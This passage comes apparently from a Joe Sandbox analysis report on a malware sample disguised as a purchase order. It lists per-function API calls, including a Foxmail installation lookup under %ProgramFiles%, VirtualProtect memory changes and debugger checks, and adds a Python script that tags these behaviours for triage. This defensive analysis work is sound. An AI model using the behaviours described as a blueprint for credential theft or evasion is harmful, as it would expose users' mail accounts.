                                                                                                        • Part of subcall function 370010F1: FindClose.KERNEL32(00000000), ref: 370011DB
                                                                                                      • lstrlenW.KERNEL32(?), ref: 370014C5
                                                                                                      • lstrlenW.KERNEL32(?), ref: 370014E0
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 3700150F
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001521
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37001547
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001553
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 37001579
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 37001585
                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 370015AB
                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 370015B7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                      • API String ID: 672098462-2938083778
                                                                                                      • Opcode ID: 305d2fab3f80a2114c67beff6a1ca26726f9aca3c6b19f4b5f6bc9e97d3357a7
                                                                                                      • Instruction ID: fd479b9a37a1ca2bbaa5a41c04506a35a88e63841a2d8b6b3ce7fad0ab3a40c9
                                                                                                      • Opcode Fuzzy Hash: 305d2fab3f80a2114c67beff6a1ca26726f9aca3c6b19f4b5f6bc9e97d3357a7
                                                                                                      • Instruction Fuzzy Hash: B581D275A00318A9EB20DBA0DC85FDE7378FF84710F1005EAF608E7190EAB55A85CF96

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(3700C7DD), ref: 3700C7E6
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                        • Part of subcall function 3700C803: GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                        • Part of subcall function 3700C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                        • Part of subcall function 3700C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction ID: 731a84f22fc6244b14547b8ac6f84c0740ba5a0dddc471af947af663edf22b48
                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                      • Instruction Fuzzy Hash: 3C012E70A493413CBA1042B40C04AFB6FD89B236B0B240BD6E11086193D9A48106CBAE

                                                                                                      Control-flow Graph

                                                                                                       • Control-flow graph rendering omitted. Entry block 3700c7a7-3700c7bc; blocks carrying API calls: 3700c800-3700c80b GetProcAddress, 3700c80d-3700c81a VirtualProtect, 3700c81c-3700c82a VirtualProtect, 3700c835-3700c83d GetModuleHandleA, 3700c85f-3700c860 GetProcAddress; internal calls to 3700c7e6 and 3700c877.
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                        • Part of subcall function 3700C7E6: GetModuleHandleA.KERNEL32(3700C7DD), ref: 3700C7E6
                                                                                                        • Part of subcall function 3700C7E6: GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                        • Part of subcall function 3700C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                        • Part of subcall function 3700C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 2099061454-0
                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction ID: e53b605041d83e6cbe3ca7d30d4785c736e231ac7da864f08a7a2ef8a7b1e29c
                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                      • Instruction Fuzzy Hash: 632103764487816FF7118BB44C04BE77FD8DB172B0F1906D6D080CB283E5A89446CBAE

                                                                                                      Control-flow Graph

                                                                                                       • Control-flow graph rendering omitted. Entry block 3700c803-3700c80b GetProcAddress; other blocks carrying API calls: 3700c80d-3700c81a VirtualProtect, 3700c81c-3700c82a VirtualProtect, 3700c835-3700c83d GetModuleHandleA, 3700c85f-3700c865 GetProcAddress; internal call to 3700c877.
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
                                                                                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
                                                                                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
                                                                                                      • GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                       • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 2152742572-0
                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction ID: 329396a09b8218e703c44d7a77eb92d2dd391a731156605571dc599e5b4dd8f5
                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                      • Instruction Fuzzy Hash: 0CF0F0B5A897413CFA1145B40C45EFB5FCC8B276B0B241BD6E210C7183D8A985068BFE
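
Two listings on this page are the ones a triager reads first: the function at 37001434 that reads %ProgramFiles% and then walks a directory with FindFirstFileW/FindNextFileW while carrying the strings Foxmail and ProgramFiles, and the 3700C803 function that resolves an export with GetProcAddress and calls VirtualProtect twice over 0x78 (120) bytes, first with 00000004 (PAGE_READWRITE) and then with the saved old protection (the unresolved third argument, shown as ?). The Python below is an added example, not Joe Sandbox code and not code from the sample: it parses API lines in the shape this report prints (Name.MODULE(args), ref: addr, with an optional "Part of subcall function X:" prefix, and "$"-separated String IDs) and tags the behaviours they imply. The line shapes and the "$" separator are assumed from the lines visible on this page; the PAGE_* values are the winnt.h constants; the tag names and the two sample listings (copied from the report into string constants) are this example's own.

```python
"""Triage helper for Joe Sandbox per-function API listings.

Added example for this page, not Joe Sandbox or Remcos code. Line shapes are
inferred from the listings shown in the report; tag names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One API line with the leading bullet stripped, e.g.
#   VirtualProtect.KERNEL32(?,00000078,00000004,?,...), ref: 3700C816
#   Part of subcall function 370010F1: FindFirstFileW.KERNEL32(...), ref: 37001193
#   #17.COMCTL32 ref: 00403379        (ordinal import, no argument list)
_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# winnt.h memory-protection constants (real values, not assumptions).
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]    # raw tokens; "?" means the sandbox could not resolve the value
    ref: int                 # call-site address
    subcall: Optional[int]   # callee address when the call sits inside a called function


def parse_listing(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Return (api_calls, string_ids) for one function block of the report."""
    calls: List[ApiCall] = []
    strings: List[str] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("String ID:"):
            # '$'-separated on this page (")$Foxmail$ProgramFiles"); assumed convention.
            strings += [s.strip() for s in line[len("String ID:"):].split("$") if s.strip()]
            continue
        m = _API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
            calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
    return calls, strings


def _hexarg(tok: str) -> Optional[int]:
    """Resolve an 8-hex-digit argument token; an unresolved '?' yields None."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def triage(text: str) -> List[str]:
    """Apply behaviour rules to one listing and return the sorted tags."""
    calls, strings = parse_listing(text)
    names = [c.name for c in calls]
    tags = set()
    # Dynamic import resolution: a module handle or LoadLibrary feeding GetProcAddress.
    if "GetProcAddress" in names and any(n.startswith(("GetModuleHandle", "LoadLibrary")) for n in names):
        tags.add("dynamic-api-resolution")
    # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): read the resolved constant only.
    for c in calls:
        if c.name == "VirtualProtect" and len(c.args) >= 3:
            size, prot = _hexarg(c.args[1]), _hexarg(c.args[2])
            if prot in WRITABLE:
                tags.add(f"makes-memory-writable:{PAGE_PROTECT[prot]}:{size}B")
            if prot in EXECUTABLE:
                tags.add("makes-memory-executable")
    # Directory walk under %ProgramFiles% with a mail-client name among the strings.
    if any(n.startswith("FindFirstFile") for n in names) and any(n.startswith("FindNextFile") for n in names):
        tags.add("filesystem-enumeration")
        env_args = [a for c in calls if c.name.startswith("GetEnvironmentVariable") for a in c.args]
        if "ProgramFiles" in env_args and "Foxmail" in strings:
            tags.add("foxmail-install-lookup")
    return sorted(tags)


# Constructed sample input: lines copied from the two listings above.
FOXMAIL_LISTING = """
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37001434
  • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37001137
  • Part of subcall function 370010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001193
  • Part of subcall function 370010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 370011D0
  • Part of subcall function 370010F1: FindClose.KERNEL32(00000000), ref: 370011DB
• lstrcatW.KERNEL32(00000000), ref: 37001521
• String ID: )$Foxmail$ProgramFiles
"""
PROTECT_LISTING = """
• GetProcAddress.KERNEL32(00000000,3700C7F4), ref: 3700C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,3700C7F4,3700C7DD), ref: 3700C82A
• GetModuleHandleA.KERNEL32(?,3700C7DD), ref: 3700C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 3700C860
"""

if __name__ == "__main__":
    for label, listing in (("37001434", FOXMAIL_LISTING), ("3700C803", PROTECT_LISTING)):
        print(label, triage(listing))
```

The second VirtualProtect call passes the protection saved by the first one back in (the ? third argument), so the listing records a temporary 120-byte write window followed by a restore, not a permanent writable mapping; the rule therefore tags only the resolved constant and leaves unresolved arguments alone rather than guessing. Read the tags next to the String IDs of the same block: FindFirstFileW plus ProgramFiles on their own is ordinary installer behaviour, and it is the Foxmail string that turns the 37001434 block into a mail-client lookup.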

                                                                                                      Control-flow Graph

                                                                                                       • Control-flow graph rendering omitted. Entry block 404b6e-404bba GetDlgItem * 2; blocks carrying API calls: 404bc0-404c54 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2, 404c56-404c61 SendMessageW, 404c63-404c6a DeleteObject, 404c7e-404c9b SendMessageW * 2, 404d15-404d4b SendMessageW, 404d51-404d60 SendMessageW, 404d62-404d78 SendMessageW, 404d9a-404dad GetWindowLongW SetWindowLongW, 404db9-404dcc ShowWindow, 404eaf-404ebb SendMessageW, 404f16-404f25 SendMessageW, 404f2b-404f3c SendMessageW, 404f49-404f62 SendMessageW, 404f73-404f79 SendMessageW, 404f8d-404f8e ImageList_Destroy, 404f9d-404f9e GlobalFree, 40500d-40501c SendMessageW, 405097-4050cf SendMessageW * 2, 4050e9-4050fd InvalidateRect, 405125-40514f ShowWindow GetDlgItem ShowWindow; internal calls to 405f6a, 40419a, 404abc, 4011ef, 404201, 401299, 4041cf, 40117d, 404b3c, 4012e2, 404a8f and 4049d6.
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C64
                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                                                                      • ShowWindow.USER32(00000000), ref: 0040514F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                      • String ID: $M$N
                                                                                                      • API String ID: 1638840714-813528018
                                                                                                      • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                                                                      • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58

                                                                                                      Control-flow Graph

                                                                                                       • Control-flow graph rendering omitted. Entry block 40335a-4033f2 #17 SetErrorMode OleInitialize SHGetFileInfoW GetCommandLineW GetModuleHandleW; blocks carrying API calls: 4033fb-40340f CharNextW, 40352a-403544 GetTempPathW, 403546-403564 GetWindowsDirectoryW lstrcatW, 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2, 40359c-4035b6 DeleteFileW, 403667-403676 OleUninitialize, 40367c-40368c ExitProcess, 403692-4036ac lstrcatW lstrcmpiW, 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW, 4036ff-40371b DeleteFileW, 40371d-40372d CopyFileW, 403751-403758 CloseHandle, 4037a5-4037b7 GetCurrentProcess, 403801-40380c ExitWindowsEx, 403823-403827 ExitProcess; internal calls to 4062b2, 405f48, 4059c0, 403326, 402dbc, 40382d, 405724, 40391f, 405a9b, 405f6a, 405de2, 4056c3 and 40140b.
APIs
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNEL32(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
  • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
  • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
• SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
  • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
• GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
• GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
• CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
• GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
• GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
• lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
• GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
• lstrcatW.KERNEL32(00436800,Low), ref: 00403574
• SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
• SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
• DeleteFileW.KERNEL32(00436000), ref: 004035A1
• OleUninitialize.OLE32(?), ref: 0040366C
• ExitProcess.KERNEL32 ref: 0040368C
• lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
• lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
• CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
• SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
• DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
• CopyFileW.KERNEL32(00437800,0041FEA8,00000001), ref: 00403725
• CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
• GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
• ExitProcess.KERNEL32 ref: 00403827
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-1875889550
• Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
• Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
• Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
• Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
APIs
• DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 004057F9
• lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405841
• lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405864
• lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040586A
• FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 0040587A
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
• FindClose.KERNEL32(00000000), ref: 00405929
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: \*.*
• API String ID: 2035342205-1173974218
• Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
• Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
• Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
• Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
• Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
• Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
• Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
APIs
• FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
• FindClose.KERNEL32(00000000), ref: 004062A2
Strings
Memory Dump Source
• Source File: 00000002.00000002.4572002959.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.4571988078.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573311364.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573332859.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.4573359055.000000000044A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: 8WB
• API String ID: 2295610775-3088156181
• Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
• Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
• Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
• Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 370061DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 370061E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 370061F1
Memory Dump Source
• Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
• Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: deebfc122553c54d9d3913a739eb27c8a22f0defff1e57f7937a0b4eb09835c5
• Instruction ID: ba84ad257589d99016d8eb9f1e28b270216102d3dce4b458714c79b3370d082f
